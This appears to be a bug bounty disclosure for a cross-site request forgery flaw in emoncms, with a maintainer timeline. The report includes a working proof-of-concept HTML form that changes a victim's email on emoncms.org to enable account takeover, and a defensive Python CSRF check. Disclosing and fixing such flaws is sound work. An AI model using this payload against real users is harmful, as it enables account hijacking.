Improper Authorization in Handler for Custom URL Scheme in emoncms/emoncms

Valid

Reported on

Jul 15th 2021


✍️ Description

In a CSRF attack, if the attacker is able to change the victim's email address, the attacker can set it to an email address they control, obtain a new password through the password reset flow, and take over the account.

🕵️‍♂️ Proof of Concept

1. You log in to your account.
2. You make a file containing the following HTML.
3. The client (victim) should open the HTML file.
4. The email is changed after clicking "Submit request".

<!-- PoC.html -->
<html>
  <body>
    <!-- hide the attacker page URL from the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- a plain GET form: the browser attaches the victim's emoncms session cookie -->
    <form action="https://emoncms.org/user/changeemail.json">
      <input type="hidden" name="email" value="victim&#64;mail&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

The attacker can take full control of the victim's account.

Fix

You can require the session cookie value to be sent back in a custom request header; this is the fastest way to protect your users.
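The guard suggested above, as an added illustration that is not emoncms code: a state-changing handler like the email change accepts only a POST whose custom header echoes a session-bound CSRF cookie, which the cross-site form in the PoC cannot supply (cookie and header names are assumptions).

```python
# Added example, not the emoncms implementation: a CSRF guard for a
# state-changing endpoint such as /user/changeemail.json, following the
# report's fix suggestion (cookie value echoed in a custom header).
import hmac
import secrets
from dataclasses import dataclass, field

CSRF_COOKIE = "emoncms_csrf"          # assumed cookie name
CSRF_HEADER = "X-CSRF-Token"          # assumed header name
ALLOWED_ORIGIN = "https://emoncms.org"


@dataclass
class Request:
    method: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def issue_csrf_cookie() -> str:
    """Per-session random token the server sets as a cookie at login."""
    return secrets.token_hex(32)


def csrf_check(req: Request) -> tuple:
    """Return (allowed, reason) for a request that changes server state."""
    # 1. State changes must not be reachable via GET (the PoC form uses GET).
    if req.method != "POST":
        return False, "state change requires POST"
    # 2. When the browser sends an Origin header it must be our own site.
    origin = req.headers.get("Origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return False, "cross-site origin " + origin
    # 3. Custom header must match the cookie; an HTML form cannot set headers,
    #    and a cross-site script cannot read the cookie to copy it.
    cookie_tok = req.cookies.get(CSRF_COOKIE, "")
    header_tok = req.headers.get(CSRF_HEADER, "")
    if not cookie_tok or not hmac.compare_digest(cookie_tok, header_tok):
        return False, "missing or mismatched CSRF token"
    return True, "ok"


def change_email(req: Request, account: dict) -> dict:
    """Handler: update the stored email only when the CSRF guard passes."""
    ok, reason = csrf_check(req)
    if not ok:
        return {"success": False, "message": reason}
    account["email"] = req.form["email"]
    return {"success": True, "message": "email updated"}
```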

Occurrences

We have contacted a member of the emoncms team and are waiting to hear back (a year ago)
emoncms/emoncms maintainer (a year ago):

Thanks again!

emoncms/emoncms maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c a year ago
The fix bounty has been dropped